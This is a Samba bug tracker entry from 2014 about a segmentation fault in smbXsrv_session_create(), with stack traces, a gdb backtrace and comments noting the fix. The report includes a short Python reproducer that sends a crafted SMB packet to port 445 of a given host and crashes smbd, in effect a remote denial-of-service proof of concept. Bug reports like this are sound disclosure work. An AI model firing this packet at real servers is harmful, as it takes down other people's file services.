10766 – segfault in smbXsrv_session_create()

Bug 10766 - segfault in smbXsrv_session_create()

Summary: segfault in smbXsrv_session_create()

Status:	RESOLVED FIXED

Alias:	None

Product:	Samba 4.1 and newer
Classification:	Unclassified
Component:	File services (show other bugs)
Version:	4.1.11
Hardware:	All All

Importance:	P5 normal (vote)
Target Milestone:	---
Assignee:	Jeremy Allison
QA Contact:	Samba QA Contact

URL:
Keywords:

Depends on:
Blocks:

Reported:	2014-08-08 16:24 UTC by dean
Modified:	2017-01-03 08:09 UTC (History)
CC List:	1 user (show)

See Also:

Attachments
git-am fix for 4.1.next and 4.0.next. (1.41 KB, patch) 2014-09-09 18:11 UTC, Jeremy Allison	jra: review? (metze)	Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description dean 2014-08-08 16:24:06 UTC

repro:

#!/usr/bin/env python
import socket
import sys
data = '00000058ff534d4273000000001843c8000000000000000000000000ffff814d000004000dff000000ffff0200814d00000000000000000000000054c000001b00000000000055006e00690078000000530061006d00620061000000'
def sendpacket(dataz):
               s1 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
               s1.connect((sys.argv[1],445))
               raw_data = ''
               i = 0
               while i<len(dataz):
                              raw_data += chr(int(dataz[i:i+2],16))
                              i+=2
               s1.send(raw_data)
               print s1.recv(1024)

print "sending test...."
sendpacket(data)


stack trace from smbd:

INTERNAL ERROR: Signal 11 in pid 25399 (4.1.11)
Please read the Trouble-Shooting section of the Samba HOWTO
===============================================================
PANIC (pid 25399): internal error
BACKTRACE: 25 stack frames:
 #0 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(log_stack_trace+0x2b) [0xb7087301]
 #1 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(smb_panic_s3+0x82) [0xb708715d]
 #2 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(smb_panic+0x2a) [0xb76c0425]
 #3 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(+0x1a0e7) [0xb76c00e7]
 #4 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsamba-util.so.0(+0x1a0f8) [0xb76c00f8]
 #5 [0xb770e400]
 #6 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(smbXsrv_session_create+0x52) [0xb74a9c6d]
 #7 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(reply_sesssetup_and_X+0x14b5) [0xb740f211]
 #8 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13cdda) [0xb7462dda]
 #9 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13cf65) [0xb7462f65]
 #10 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13df1d) [0xb7463f1d]
 #11 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13f0ee) [0xb74650ee]
 #12 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(+0x13f1d4) [0xb74651d4]
 #13 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(run_events_poll+0x49f) [0xb70a4bd8]
 #14 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(+0x3cea0) [0xb70a4ea0]
 #15 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0(_tevent_loop_once+0xf3) [0xb7319683]
 #16 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so(smbd_process+0x1421) [0xb7468897]
 #17 ./smbd(+0x9004) [0xb7736004]
 #18 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(run_events_poll+0x49f) [0xb70a4bd8]
 #19 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0(+0x3cea0) [0xb70a4ea0]
 #20 /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0(_tevent_loop_once+0xf3) [0xb7319683]
 #21 ./smbd(+0x9fb1) [0xb7736fb1]
 #22 ./smbd(main+0x1829) [0xb773893f]
 #23 /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6) [0xb69ace66]
 #24 ./smbd(+0x4801) [0xb7731801]


gdb:

Program received signal SIGSEGV, Segmentation fault.
0xb7d7cc6d in smbXsrv_session_create () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so

(gdb) bt
#0  0xb7d7cc6d in smbXsrv_session_create () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#1  0xb7ce2211 in reply_sesssetup_and_X () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#2  0xb7d35dda in switch_message () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#3  0xb7d35f65 in construct_reply () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#4  0xb7d36f1d in process_smb () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#5  0xb7d380ee in smbd_server_connection_read_handler () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#6  0xb7d381d4 in smbd_server_connection_handler () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#7  0xb7977bd8 in run_events_poll () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#8  0xb7977ea0 in s3_event_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#9  0xb7bec683 in _tevent_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0
#10 0xb7d3b897 in smbd_process () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libsmbd_base.so
#11 0x80009004 in smbd_accept_connection ()
#12 0xb7977bd8 in run_events_poll () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#13 0xb7977ea0 in s3_event_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/libsmbconf.so.0
#14 0xb7bec683 in _tevent_loop_once () from /home/dean/hacking/samba_418/samba-4.1.11/bin/shared/private/libtevent.so.0
#15 0x80009fb1 in smbd_parent_loop ()
#16 0x8000b93f in main ()

Comment 1 Jeremy Allison 2014-09-09 18:11:10 UTC

Created attachment 10274 [details]
git-am fix for 4.1.next and 4.0.next.

Patch that went into master. Applies cleanly to 4.1.next, 4.0.next.

Comment 2 Andrew Bartlett 2017-01-03 08:09:29 UTC

Fixed in Samba 4.3 with dec0243c8595359df6448caf5d242b3d2062deb6

Samba 4.2 and earlier are no longer in support, to marking as fixed.